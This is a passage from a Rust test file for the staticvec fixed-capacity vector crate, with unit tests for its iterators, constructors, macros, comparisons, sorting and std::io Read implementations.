fn is_full() {
let mut v = StaticVec::<i32, 1>::new();
v.push(1);
assert!(v.is_full());
}
#[test]
fn is_not_full() {
let v = StaticVec::<i32, 1>::new();
assert!(v.is_not_full());
}
#[test]
fn iter() {
let v = staticvec![1, 2, 3, 4, 5];
let mut i = v.iter();
assert_eq!(*i.next().unwrap(), 1);
assert_eq!(*i.next_back().unwrap(), 5);
assert_eq!("StaticVecIterConst([2, 3, 4])", format!("{:?}", i));
assert_eq!(*i.next().unwrap(), 2);
assert_eq!(*i.next_back().unwrap(), 4);
assert_eq!("StaticVecIterConst([3])", format!("{:?}", i));
assert_eq!(*i.next().unwrap(), 3);
assert_eq!("StaticVecIterConst([])", format!("{:?}", i));
let v2 = staticvec![ZST {}, ZST {}, ZST {}, ZST {}];
let it2 = v2.iter();
assert_eq!(it2.as_slice(), &[ZST {}, ZST {}, ZST {}, ZST {}]);
}
#[test]
fn iter_nth() {
let v3 = staticvec![ZST {}, ZST {}, ZST {}, ZST {}];
let mut i3 = v3.iter();
assert_eq!(i3.nth(2).unwrap(), &ZST {});
assert_eq!(i3.as_slice(), &[ZST {}]);
assert_eq!(i3.nth(0).unwrap(), &ZST {});
assert_eq!(i3.nth(0), None);
assert_eq!(i3.nth(0), None);
let v4 = staticvec![1, 2, 3, 4];
let mut i4 = v4.iter();
assert_eq!(i4.nth(2).unwrap(), &3);
assert_eq!(i4.as_slice(), &[4]); | let xs = staticvec![0, 1, 2, 3, 4, 5];
for (i, &x) in xs.iter().enumerate() {
assert_eq!(i, x);
}
let mut it = xs.iter().enumerate();
while let Some((i, &x)) = it.nth(0) {
assert_eq!(i, x);
}
let mut it = xs.iter().enumerate();
while let Some((i, &x)) = it.nth(1) {
assert_eq!(i, x);
}
let (i, &x) = xs.iter().enumerate().nth(3).unwrap();
assert_eq!(i, x);
assert_eq!(i, 3);
let xs5 = staticvec![vec![1], vec![2], vec![3], vec![4], vec![5]];
let mut it5 = xs5.iter();
assert_eq!(it5.nth(2).unwrap(), &vec![3]);
assert_eq!(it5.as_slice(), &[vec![4], vec![5]]);
assert_eq!(it5.next().unwrap(), &vec![4]);
assert_eq!(it5.next_back().unwrap(), &vec![5]);
assert_eq!(it5.nth(0), None);
let xs6 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it6 = xs6.iter();
let o = it6.nth(2);
assert_eq!(format!("{:?}", o), "Some([3, 3])");
assert_eq!(
format!("{:?}", it6),
"StaticVecIterConst([[4, 4], [5, 5], [6, 6]])"
);
let xs7 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it7 = xs7.iter();
let o = it7.nth(5);
assert_eq!(format!("{:?}", o), "Some([6, 6])");
assert_eq!(format!("{:?}", it7), "StaticVecIterConst([])");
}
#[test]
fn iter_nth_back() {
let v3 = staticvec![ZST {}, ZST {}, ZST {}, ZST {}];
let mut i3 = v3.iter();
assert_eq!(i3.nth_back(2).unwrap(), &ZST {});
assert_eq!(i3.as_slice(), &[ZST {}]);
assert_eq!(i3.nth_back(0).unwrap(), &ZST {});
assert_eq!(i3.nth_back(0), None);
assert_eq!(i3.nth_back(0), None);
let v4 = staticvec![1, 2, 3, 4];
let mut i4 = v4.iter();
assert_eq!(i4.nth_back(2).unwrap(), &2);
assert_eq!(i4.as_slice(), &[1]);
assert_eq!(i4.nth_back(0).unwrap(), &1);
assert_eq!(i4.nth_back(0), None);
assert_eq!(i4.nth_back(0), None);
let xs = staticvec![0, 1, 2, 3, 4, 5];
let mut it = xs.iter().enumerate();
while let Some((i, &x)) = it.nth_back(0) {
assert_eq!(i, x);
}
let mut it = xs.iter().enumerate();
while let Some((i, &x)) = it.nth_back(1) {
assert_eq!(i, x);
}
let (i, &x) = xs.iter().enumerate().nth_back(3).unwrap();
assert_eq!(i, x);
assert_eq!(i, 2);
let xs5 = staticvec![vec![1], vec![2], vec![3], vec![4], vec![5]];
let mut it5 = xs5.iter();
assert_eq!(it5.nth_back(1).unwrap(), &vec![4]);
assert_eq!(it5.as_slice(), &[vec![1], vec![2], vec![3]]);
assert_eq!(it5.next().unwrap(), &vec![1]);
assert_eq!(it5.next_back().unwrap(), &vec![3]);
assert_eq!(it5.nth_back(0).unwrap(), &vec![2]);
let xs6 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it6 = xs6.iter();
let o = it6.nth_back(2);
assert_eq!(format!("{:?}", o), "Some([4, 4])");
assert_eq!(
format!("{:?}", it6),
"StaticVecIterConst([[1, 1], [2, 2], [3, 3]])"
);
let xs7 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it7 = xs7.iter();
let o = it7.nth_back(5);
assert_eq!(format!("{:?}", o), "Some([1, 1])");
assert_eq!(format!("{:?}", it7), "StaticVecIterConst([])");
}
#[test]
fn iter_nth2() {
let v = staticvec![0, 1, 2, 3, 4];
for i in 0..v.len() {
assert_eq!(v.iter().nth(i).unwrap(), &v[i]);
}
assert_eq!(v.iter().nth(v.len()), None);
}
#[test]
fn iter_nth_back2() {
let v = staticvec![0, 1, 2, 3, 4];
for i in 0..v.len() {
assert_eq!(v.iter().nth_back(i).unwrap(), &v[v.len() - 1 - i]);
}
assert_eq!(v.iter().nth_back(v.len()), None);
}
#[test]
fn iter_rev_nth() {
let v = staticvec![0, 1, 2, 3, 4];
for i in 0..v.len() {
assert_eq!(v.iter().rev().nth(i).unwrap(), &v[v.len() - 1 - i]);
}
assert_eq!(v.iter().rev().nth(v.len()), None);
}
#[test]
fn iter_rev_nth_back() {
let v = staticvec![0, 1, 2, 3, 4];
for i in 0..v.len() {
assert_eq!(v.iter().rev().nth_back(i).unwrap(), &v[i]);
}
assert_eq!(v.iter().rev().nth_back(v.len()), None);
}
#[test]
fn iter_mut() {
let mut v = staticvec![1, 2, 3, 4, 5];
let mut i = v.iter_mut();
assert_eq!(*i.next().unwrap(), 1);
assert_eq!(*i.next_back().unwrap(), 5);
assert_eq!("StaticVecIterMut([2, 3, 4])", format!("{:?}", i));
assert_eq!(*i.next().unwrap(), 2);
assert_eq!(*i.next_back().unwrap(), 4);
assert_eq!("StaticVecIterMut([3])", format!("{:?}", i));
assert_eq!(*i.next().unwrap(), 3);
assert_eq!("StaticVecIterMut([])", format!("{:?}", i));
let mut v2 = staticvec![ZST {}, ZST {}, ZST {}, ZST {}];
let it2 = v2.iter_mut();
assert_eq!(it2.as_slice(), &[ZST {}, ZST {}, ZST {}, ZST {}]);
}
#[test]
fn iter_mut_nth() {
let mut v3 = staticvec![ZST {}, ZST {}, ZST {}, ZST {}];
let mut i3 = v3.iter_mut();
assert_eq!(i3.nth(2).unwrap(), &mut ZST {});
assert_eq!(i3.as_slice(), &mut [ZST {}]);
assert_eq!(i3.nth(0).unwrap(), &mut ZST {});
assert_eq!(i3.nth(0), None);
let mut v4 = staticvec![1, 2, 3, 4];
let mut i4 = v4.iter_mut();
assert_eq!(i4.nth(2).unwrap(), &mut 3);
assert_eq!(i4.as_slice(), &mut [4]);
assert_eq!(i4.nth(0).unwrap(), &mut 4);
assert_eq!(i4.nth(0), None);
let mut xs = staticvec![0, 1, 2, 3, 4, 5];
for (i, &mut x) in xs.iter_mut().enumerate() {
assert_eq!(i, x);
}
let mut it = xs.iter_mut().enumerate();
while let Some((i, &mut x)) = it.nth(0) {
assert_eq!(i, x);
}
let mut it = xs.iter_mut().enumerate();
while let Some((i, &mut x)) = it.nth(1) {
assert_eq!(i, x);
}
let (i, &mut x) = xs.iter_mut().enumerate().nth(3).unwrap();
assert_eq!(i, x);
assert_eq!(i, 3);
let mut xs5 = staticvec![vec![1], vec![2], vec![3], vec![4], vec![5]];
let mut it5 = xs5.iter_mut();
assert_eq!(it5.nth(2).unwrap(), &mut vec![3]);
assert_eq!(it5.as_slice(), &[vec![4], vec![5]]);
assert_eq!(it5.next().unwrap(), &mut vec![4]);
assert_eq!(it5.next_back().unwrap(), &mut vec![5]);
assert_eq!(it5.nth(0), None);
let mut xs6 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it6 = xs6.iter_mut();
let o = it6.nth(2);
assert_eq!(format!("{:?}", o), "Some([3, 3])");
assert_eq!(
format!("{:?}", it6),
"StaticVecIterMut([[4, 4], [5, 5], [6, 6]])"
);
let mut xs7 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it7 = xs7.iter_mut();
let o = it7.nth(5);
assert_eq!(format!("{:?}", o), "Some([6, 6])");
assert_eq!(format!("{:?}", it7), "StaticVecIterMut([])");
}
#[test]
fn iter_mut_nth_back() {
let mut v3 = staticvec![ZST {}, ZST {}, ZST {}, ZST {}];
let mut i3 = v3.iter_mut();
assert_eq!(i3.nth_back(2).unwrap(), &mut ZST {});
assert_eq!(i3.as_slice(), &mut [ZST {}]);
assert_eq!(i3.nth_back(0).unwrap(), &mut ZST {});
assert_eq!(i3.nth_back(0), None);
let mut v4 = staticvec![1, 2, 3, 4];
let mut i4 = v4.iter_mut();
assert_eq!(i4.nth_back(2).unwrap(), &mut 2);
assert_eq!(i4.as_slice(), &[1]);
assert_eq!(i4.nth_back(0).unwrap(), &mut 1);
assert_eq!(i4.nth_back(0), None);
let mut xs = staticvec![0, 1, 2, 3, 4, 5];
let mut it = xs.iter_mut().enumerate();
while let Some((i, &mut x)) = it.nth_back(0) {
assert_eq!(i, x);
}
let mut it = xs.iter_mut().enumerate();
while let Some((i, &mut x)) = it.nth_back(1) {
assert_eq!(i, x);
}
let (i, &mut x) = xs.iter_mut().enumerate().nth_back(3).unwrap();
assert_eq!(i, x);
assert_eq!(i, 2);
let mut xs5 = staticvec![vec![1], vec![2], vec![3], vec![4], vec![5]];
let mut it5 = xs5.iter_mut();
assert_eq!(it5.nth_back(1).unwrap(), &mut vec![4]);
assert_eq!(it5.as_slice(), &[vec![1], vec![2], vec![3]]);
assert_eq!(it5.next().unwrap(), &mut vec![1]);
assert_eq!(it5.next_back().unwrap(), &mut vec![3]);
assert_eq!(it5.nth_back(0).unwrap(), &mut vec![2]);
let mut xs6 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it6 = xs6.iter_mut();
let o = it6.nth_back(2);
assert_eq!(format!("{:?}", o), "Some([4, 4])");
assert_eq!(
format!("{:?}", it6),
"StaticVecIterMut([[1, 1], [2, 2], [3, 3]])"
);
let mut xs7 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it7 = xs7.iter_mut();
let o = it7.nth_back(5);
assert_eq!(format!("{:?}", o), "Some([1, 1])");
assert_eq!(format!("{:?}", it7), "StaticVecIterMut([])");
}
#[test]
fn into_inner() {
// Someone ELI5 why "box syntax" isn't more widely used... If I'd have known about it sooner I'd
// have never once used `Box::new()` in any of these tests (something I now feel like I'm
// ultimately gonna want to go back and change to just `box` at some point for each of them.)
let v: StaticVec<Box<i32>, 12> = staticvec![
box 1, box 2, box 3, box 4, box 5, box 6, box 7, box 8, box 9, box 10, box 11, box 12
];
let z = v.into_inner();
assert!(z.is_ok());
assert_eq!(
z.unwrap(),
[box 1, box 2, box 3, box 4, box 5, box 6, box 7, box 8, box 9, box 10, box 11, box 12]
);
let vv: StaticVec<Vec<Vec<u32>>, 4> =
staticvec![vec![vec![1]], vec![vec![2]], vec![vec![3]], vec![vec![4]]];
let zz = vv.into_inner();
assert!(zz.is_ok());
assert_eq!(
zz.unwrap(),
[vec![vec![1]], vec![vec![2]], vec![vec![3]], vec![vec![4]]]
);
let mut vvv = staticvec![box 9, box 1, box 1];
vvv.pop();
let zzz = vvv.into_inner();
assert!(zzz.is_err());
}
#[test]
fn into_iter() {
let v = staticvec![1, 2, 3, 4, 5];
let mut i = v.into_iter();
assert_eq!(i.next().unwrap(), 1);
assert_eq!(i.next_back().unwrap(), 5);
assert_eq!("StaticVecIntoIter([2, 3, 4])", format!("{:?}", i));
assert_eq!(i.next().unwrap(), 2);
assert_eq!(i.next_back().unwrap(), 4);
assert_eq!("StaticVecIntoIter([3])", format!("{:?}", i));
assert_eq!(i.next().unwrap(), 3);
assert_eq!("StaticVecIntoIter([])", format!("{:?}", i));
let v2 = staticvec![
Box::new(Struct { s: "AAA" }),
Box::new(Struct { s: "BBB" }),
Box::new(Struct { s: "CCC" })
];
let mut i2 = v2.into_iter();
assert_eq!(i2.next().unwrap(), Box::new(Struct { s: "AAA" }));
assert_eq!(i2.next().unwrap(), Box::new(Struct { s: "BBB" }));
assert_eq!(i2.next().unwrap(), Box::new(Struct { s: "CCC" }));
assert_eq!("StaticVecIntoIter([])", format!("{:?}", i2));
let v3 = staticvec![
Box::new(Struct { s: "AAA" }),
Box::new(Struct { s: "BBB" }),
Box::new(Struct { s: "CCC" })
];
let mut i3 = v3.into_iter();
// We do this so Miri can make sure it drops the remaining values properly.
i3.next();
let v4 = staticvec![ZST {}, ZST {}, ZST {}];
let mut i4 = v4.into_iter();
// We do this so Miri can make sure it drops the remaining values properly.
i4.next();
let v5 = staticvec![ZST {}, ZST {}, ZST {}, ZST {}];
let mut it5 = v5.into_iter();
assert_eq!(it5.as_slice(), &[ZST {}, ZST {}, ZST {}, ZST {}]);
assert_eq!(it5.as_mut_slice(), &mut [ZST {}, ZST {}, ZST {}, ZST {}]);
}
#[test]
fn into_iter_nth() {
let v3 = staticvec![ZST {}, ZST {}, ZST {}, ZST {}];
let mut i3 = v3.into_iter();
assert_eq!(i3.nth(2).unwrap(), ZST {});
assert_eq!(i3.as_slice(), [ZST {}]);
assert_eq!(i3.nth(0).unwrap(), ZST {});
assert_eq!(i3.nth(0), None);
assert_eq!(i3.nth(0), None);
let v4 = staticvec![1, 2, 3, 4];
let mut i4 = v4.into_iter();
assert_eq!(i4.nth(2).unwrap(), 3);
assert_eq!(i4.as_slice(), [4]);
assert_eq!(i4.nth(0).unwrap(), 4);
assert_eq!(i4.nth(0), None);
assert_eq!(i4.nth(0), None);
let xs1 = staticvec![0, 1, 2, 3, 4, 5];
for (i, x) in xs1.into_iter().enumerate() {
assert_eq!(i, x);
}
let xs2 = staticvec![0, 1, 2, 3, 4, 5];
let mut it2 = xs2.into_iter().enumerate();
while let Some((i, x)) = it2.nth(0) {
assert_eq!(i, x);
}
let xs3 = staticvec![0, 1, 2, 3, 4, 5];
let mut it3 = xs3.into_iter().enumerate();
while let Some((i, x)) = it3.nth(1) {
assert_eq!(i, x);
}
let xs4 = staticvec![0, 1, 2, 3, 4, 5];
let (i, x) = xs4.into_iter().enumerate().nth(3).unwrap();
assert_eq!(i, x);
assert_eq!(i, 3);
// We use "StaticVecs of Vec" below to test the functionality for non-trivial "need Drop" types.
let xs5 = staticvec![vec![1], vec![2], vec![3], vec![4], vec![5]];
let mut it5 = xs5.into_iter();
assert_eq!(it5.nth(2).unwrap(), vec![3]);
assert_eq!(it5.as_slice(), &[vec![4], vec![5]]);
assert_eq!(it5.next().unwrap(), vec![4]);
assert_eq!(it5.next_back().unwrap(), vec![5]);
assert_eq!(it5.nth(0), None);
let xs6 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it6 = xs6.into_iter();
let o = it6.nth(2);
assert_eq!(format!("{:?}", o), "Some([3, 3])");
assert_eq!(
format!("{:?}", it6),
"StaticVecIntoIter([[4, 4], [5, 5], [6, 6]])"
);
let xs7 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it7 = xs7.into_iter();
let o = it7.nth(5);
assert_eq!(format!("{:?}", o), "Some([6, 6])");
assert_eq!(format!("{:?}", it7), "StaticVecIntoIter([])");
}
#[test]
fn into_iter_nth_back() {
let v3 = staticvec![ZST {}, ZST {}, ZST {}, ZST {}];
let mut i3 = v3.into_iter();
assert_eq!(i3.nth_back(2).unwrap(), ZST {});
assert_eq!(i3.as_slice(), [ZST {}]);
assert_eq!(i3.nth_back(0).unwrap(), ZST {});
assert_eq!(i3.nth_back(0), None);
assert_eq!(i3.nth_back(0), None);
let v4 = staticvec![1, 2, 3, 4];
let mut i4 = v4.into_iter();
assert_eq!(i4.nth_back(2).unwrap(), 2);
assert_eq!(i4.as_slice(), [1]);
assert_eq!(i4.nth_back(0).unwrap(), 1);
assert_eq!(i4.nth_back(0), None);
assert_eq!(i4.nth_back(0), None);
let xs1 = staticvec![0, 1, 2, 3, 4, 5];
let mut it1 = xs1.into_iter().enumerate();
while let Some((i, x)) = it1.nth_back(0) {
assert_eq!(i, x);
}
let xs2 = staticvec![0, 1, 2, 3, 4, 5];
let mut it2 = xs2.into_iter().enumerate();
while let Some((i, x)) = it2.nth_back(1) {
assert_eq!(i, x);
}
let xs3 = staticvec![0, 1, 2, 3, 4, 5];
let (i, x) = xs3.into_iter().enumerate().nth_back(3).unwrap();
assert_eq!(i, x);
assert_eq!(i, 2);
// We use "StaticVecs of Vec" below to test the functionality for non-trivial "need Drop" types.
let xs5 = staticvec![vec![1], vec![2], vec![3], vec![4], vec![5]];
let mut it5 = xs5.into_iter();
assert_eq!(it5.nth_back(1).unwrap(), vec![4]);
assert_eq!(it5.as_slice(), &[vec![1], vec![2], vec![3]]);
assert_eq!(it5.next().unwrap(), vec![1]);
assert_eq!(it5.next_back().unwrap(), vec![3]);
assert_eq!(it5.nth_back(0).unwrap(), vec![2]);
let xs6 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it6 = xs6.into_iter();
let o = it6.nth_back(2);
assert_eq!(format!("{:?}", o), "Some([4, 4])");
assert_eq!(
format!("{:?}", it6),
"StaticVecIntoIter([[1, 1], [2, 2], [3, 3]])"
);
let xs7 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it7 = xs7.into_iter();
let o = it7.nth_back(5);
assert_eq!(format!("{:?}", o), "Some([1, 1])");
assert_eq!(format!("{:?}", it7), "StaticVecIntoIter([])");
}
#[cfg(feature = "std")]
#[test]
fn into_vec() {
let v = staticvec![
Box::new(Struct { s: "AAA" }),
Box::new(Struct { s: "BBB" }),
Box::new(Struct { s: "CCC" })
];
let vv = v.into_vec();
assert_eq!(vv.capacity(), 3);
assert_eq!(vv.len(), 3);
}
#[test]
fn last() {
let v = staticvec![1, 2, 3];
assert_eq!(*v.last().unwrap(), 3);
}
#[test]
fn last_mut() {
let mut v = staticvec![1, 2, 3];
assert_eq!(*v.last_mut().unwrap(), 3);
}
#[test]
fn len() {
let a = staticvec![1, 2, 3];
assert_eq!(a.len(), 3);
}
#[test]
fn macros() {
let v = staticvec![staticvec![staticvec![1, 2, 3, 4]]];
assert_eq!(v[0][0], [1, 2, 3, 4]);
let v2 = staticvec![12.0; 64];
assert!(v2 == [12.0; 64]);
const V3: StaticVec<i32, 4> = staticvec![1, 2, 3, 4];
assert_eq!(V3, [1, 2, 3, 4]);
const V4: StaticVec<i32, 128> = staticvec![27; 128];
assert!(V4 == [27; 128]);
static V: StaticVec<f64, 3> = sortedstaticvec!(f64, [16.0, 15.0, 14.0]);
assert_eq!(V, [14.0, 15.0, 16.0]);
assert_eq!(V.reversed().drain(0..1), [16.0]);
static VV: StaticVec<f64, 0> = sortedstaticvec!(f64, []);
assert_eq!(VV, []);
// Test trailing commas
assert_eq!(staticvec![1, 2, 3, 4,], staticvec![1, 2, 3, 4]);
}
#[test]
fn math_functions() {
static A: StaticVec<f64, 4> = staticvec![4.0, 5.0, 6.0, 7.0];
static B: StaticVec<f64, 4> = staticvec![2.0, 3.0, 4.0, 5.0];
assert_eq!(A.added(&B), [6.0, 8.0, 10.0, 12.0]);
assert_eq!(A.subtracted(&B), [2.0, 2.0, 2.0, 2.0]);
assert_eq!(A.multiplied(&B), [8.0, 15.0, 24.0, 35.0]);
assert_eq!(A.divided(&B), [2.0, 1.6666666666666667, 1.5, 1.4]);
}
#[test]
fn mut_ptr_at() {
let mut v = staticvec![1, 2, 3];
unsafe { assert_eq!(*v.mut_ptr_at(0), 1) };
unsafe { assert_eq!(*v.mut_ptr_at(1), 2) };
unsafe { assert_eq!(*v.mut_ptr_at(2), 3) };
}
#[test]
fn mut_ptr_at_unchecked() {
let mut v = staticvec![1, 2, 3];
unsafe { assert_eq!(*v.mut_ptr_at_unchecked(0), 1) };
unsafe { assert_eq!(*v.mut_ptr_at_unchecked(1), 2) };
unsafe { assert_eq!(*v.mut_ptr_at_unchecked(2), 3) };
}
#[test]
fn new() {
let v = StaticVec::<i32, 1>::new();
assert_eq!(v.capacity(), 1);
}
#[test]
fn new_from_array() {
let vec = StaticVec::<i32, 3>::new_from_array([1; 3]);
assert_eq!(vec, [1, 1, 1]);
let vec2 = StaticVec::<i32, 3>::new_from_array([1; 6]);
assert_eq!(vec2, [1, 1, 1]);
let vec3 = StaticVec::<i32, 27>::new_from_array([0; 0]);
assert_eq!(vec3, []);
let vec4 = StaticVec::<f32, 1024>::new_from_array([24.0; 512]);
assert_eq!(vec4, staticvec![24.0; 512]);
let v = StaticVec::<i32, 3>::new_from_array([1, 2, 3]);
assert_eq!(v, [1, 2, 3]);
let v2 = StaticVec::<i32, 3>::new_from_array([1, 2, 3, 4, 5, 6]);
assert_eq!(v2, [1, 2, 3]);
let v5 = StaticVec::<Box<Struct>, 2>::new_from_array([
Box::new(Struct { s: "AAA" }),
Box::new(Struct { s: "BBB" }),
Box::new(Struct { s: "CCC" }),
Box::new(Struct { s: "DDD" }),
Box::new(Struct { s: "EEE" }),
]);
assert_eq!(
v5,
[Box::new(Struct { s: "AAA" }), Box::new(Struct { s: "BBB" })]
);
}
#[test]
fn new_from_const_array() {
const VEC2: StaticVec<i32, 6> = StaticVec::new_from_const_array([1; 6]);
assert_eq!(VEC2, [1, 1, 1, 1, 1, 1]);
const VEC3: StaticVec<i32, 0> = StaticVec::new_from_const_array([0; 0]);
assert_eq!(VEC3, []);
const VEC4: StaticVec<f32, 512> = StaticVec::new_from_const_array([24.0; 512]);
assert_eq!(VEC4, staticvec![24.0; 512]);
const V: StaticVec<&'static str, 3> = StaticVec::new_from_const_array(["A", "B", "C"]);
assert_eq!(V.reversed(), ["C", "B", "A"]);
const V2: StaticVec<u8, 6> = StaticVec::new_from_const_array([1, 2, 3, 4, 5, 6]);
assert_eq!(V2, [1, 2, 3, 4, 5, 6]);
const V6: StaticVec<Struct, 3> = StaticVec::new_from_const_array([
Struct { s: "AAA" },
Struct { s: "BBB" },
Struct { s: "CCC" },
]);
assert_eq!(
V6,
[
Struct { s: "AAA" },
Struct { s: "BBB" },
Struct { s: "CCC" },
]
);
}
#[test]
fn new_from_slice() {
let vec = StaticVec::<i32, 3>::new_from_slice(&[1, 2, 3]);
assert_eq!(vec, [1, 2, 3]);
let vec2 = StaticVec::<i32, 3>::new_from_slice(&[1, 2, 3, 4, 5, 6]);
assert_eq!(vec2, [1, 2, 3]);
let vec3 = StaticVec::<i32, 27>::new_from_slice(&[]);
assert_eq!(vec3, []);
}
#[test]
fn partial_eq() {
assert_eq!(StaticVec::<i32, 0>::new(), [0; 0]);
assert_eq!(StaticVec::<i32, 0>::new(), []);
assert_eq!(StaticVec::<i32, 0>::new(), &[]);
assert_eq!(StaticVec::<i32, 0>::new(), &mut []);
assert_eq!(StaticVec::<i32, 0>::new(), StaticVec::<i32, 0>::new());
assert_eq!(StaticVec::<i32, 0>::new(), &StaticVec::<i32, 0>::new());
assert_eq!(StaticVec::<i32, 0>::new(), &mut StaticVec::<i32, 0>::new());
// assert_eq! is written in a way that's limited by LengthAtMost32, so I can't
// use it for the next part.
if staticvec![1; 64] != [1; 64] {
panic!();
}
if &staticvec![1; 64] != [1; 64] {
panic!();
}
if &mut staticvec![1; 64] != [1; 64] {
panic!();
}
if staticvec![1; 64] != &[1; 64] {
panic!();
}
if staticvec![1; 64] != &mut [1; 64] {
panic!();
}
if staticvec![1; 64] != staticvec![1; 64] {
panic!();
}
if staticvec![1; 64] != &staticvec![1; 64] {
panic!();
}
if staticvec![1; 64] != &mut staticvec![1; 64] {
panic!();
}
}
#[test]
fn partial_ord() {
assert!(staticvec![1] < staticvec![2]);
assert!(staticvec![1] > []);
assert!(staticvec![1] <= &staticvec![2]);
assert!(staticvec![1] >= &[]);
assert!(staticvec![1] > &mut []);
assert!(staticvec![vec![1], vec![2]] < staticvec![vec![1], vec![2], vec![3]]);
assert!(staticvec![vec![1]] > []);
assert!(staticvec![vec![1]] <= &staticvec![vec![2]]);
assert!(staticvec![vec![1]] >= &[]);
assert!(staticvec![vec![1]] > &mut []);
}
#[test]
fn pop() {
let mut vec = staticvec![1, 2, 3];
assert_eq!(vec.pop(), Some(3));
assert_eq!(vec, [1, 2]);
}
#[test]
fn ptr_at() {
let v = staticvec![1, 2, 3];
unsafe { assert_eq!(*v.ptr_at(0), 1) };
unsafe { assert_eq!(*v.ptr_at(1), 2) };
unsafe { assert_eq!(*v.ptr_at(2), 3) };
}
#[test]
fn ptr_at_unchecked() {
let v = staticvec![1, 2, 3];
unsafe { assert_eq!(*v.ptr_at_unchecked(0), 1) };
unsafe { assert_eq!(*v.ptr_at_unchecked(1), 2) };
unsafe { assert_eq!(*v.ptr_at_unchecked(2), 3) };
}
#[test]
fn push() {
let mut vec = StaticVec::<i32, 4>::new_from_slice(&[1, 2, 3]);
vec.push(3);
assert_eq!(vec, [1, 2, 3, 3]);
}
#[test]
fn quicksorted_unstable() {
const V: StaticVec<StaticVec<i32, 3>, 2> = staticvec![staticvec![1, 2, 3], staticvec![6, 5, 4]];
assert_eq!(
V.iter()
.flatten()
.collect::<StaticVec<i32, 6>>()
.quicksorted_unstable(),
[1, 2, 3, 4, 5, 6]
);
let v2 = StaticVec::<i32, 128>::new();
assert_eq!(v2.quicksorted_unstable(), []);
assert_eq!(staticvec![2, 1].quicksorted_unstable(), [1, 2]);
}
#[test]
fn quicksort_unstable() {
let v1 = staticvec![staticvec![1, 2, 3], staticvec![6, 5, 4]];
let mut v2 = v1.iter().flatten().collect::<StaticVec<i32, 6>>();
v2.quicksort_unstable();
assert_eq!(v2, [1, 2, 3, 4, 5, 6]);
let mut v3 = StaticVec::<i32, 128>::new();
v3.quicksort_unstable();
assert_eq!(v3, []);
let mut v4 = staticvec![2, 1];
v4.quicksort_unstable();
assert_eq!(v4, [1, 2]);
}
#[cfg(feature = "std")]
mod read_tests {
use staticvec::*;
use std::io::{self, BufRead, Read};
// We provide custom implementations of most `Read` methods; test those
// impls
#[test]
fn read() {
let mut ints = staticvec![1, 2, 3, 4, 6, 7, 8, 9, 10];
let mut buffer = [0, 0, 0, 0];
assert_eq!(ints.read(&mut buffer).unwrap(), 4);
assert_eq!(buffer, [1, 2, 3, 4]);
let mut buffer2 = [];
assert_eq!(ints.read(&mut buffer2).unwrap(), 0);
assert_eq!(buffer2, []);
let mut buffer3 = staticvec![0; 9];
assert_eq!(ints.read(buffer3.as_mut_slice()).unwrap(), 5);
assert_eq!(ints, []);
assert_eq!(ints.read(buffer3.as_mut_slice()).unwrap(), 0);
assert_eq!(ints, []);
assert_eq!(ints.read(staticvec![].as_mut_slice()).unwrap(), 0);
}
#[test]
fn read_to_end() {
let mut ints = staticvec![1, 2, 3, 4, 5, 6, 7];
let mut buffer = vec![2, 3];
assert_eq!(ints.read_to_end(&mut buffer).unwrap(), 7);
assert_eq!(ints, &[]);
assert_eq!(buffer, &[2, 3, 1, 2, 3, 4, 5, 6, 7]);
}
#[test]
fn read_to_string() {
// Hello world in ascii
let mut input = StaticVec::<u8, 30>::new_from_slice(b"World!");
let mut dest = String::from("Hello, ");
assert_eq!(input.read_to_string(&mut dest).unwrap(), 6);
assert_eq!(dest, "Hello, World!");
assert_eq!(input, &[]);
}
#[test]
fn read_to_string_failure() {
// Invalid UTF-8 bytes
let mut input = staticvec![0b1101_1010, 0b1100_0000];
let mut dest = String::new();
let err = input.read_to_string(&mut dest).unwrap_err();
assert_eq!(err.kind(), io::ErrorKind::InvalidData);
}
#[test]
fn read_exact() {
let mut ints = staticvec![1, 2, 3, 4, 6, 7, 8, 9, 10];
let mut buffer = [0, 0, 0, 0];
ints.read_exact(&mut buffer).unwrap();
assert_eq!(buffer, [1, 2, 3, 4]);
assert_eq!(ints, &[6, 7, 8, 9, 10]);
let mut buffer2 = [0, 0, 0, 0, 0, 0, 0, 0];
let err = ints.read_exact(&mut buffer2).unwrap_err();
assert_eq!(err.kind(), io::ErrorKind::UnexpectedEof);
}
#[test]
fn read_vectored() {
let mut ints = staticvec![1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12];
let mut buf1 = [0; 4];
let mut buf2 = [0; 4];
let mut buf3 = [0; 4];
let mut bufs = [
io::IoSliceMut::new(&mut buf1),
io::IoSliceMut::new(&mut buf2),
io::IoSliceMut::new(&mut buf3),
];
assert_eq!(ints.read_vectored(&mut bufs).unwrap(), 12);
assert_eq!(
"[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]",
format!("{:?}", bufs)
);
assert_eq!(ints, []);
let mut ints2 = staticvec![1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12];
let mut buf4 = [0; 2];
let mut buf5 = [0; 3];
let mut buf6 = [0; 4];
let mut bufs2 = [
io::IoSliceMut::new(&mut buf4),
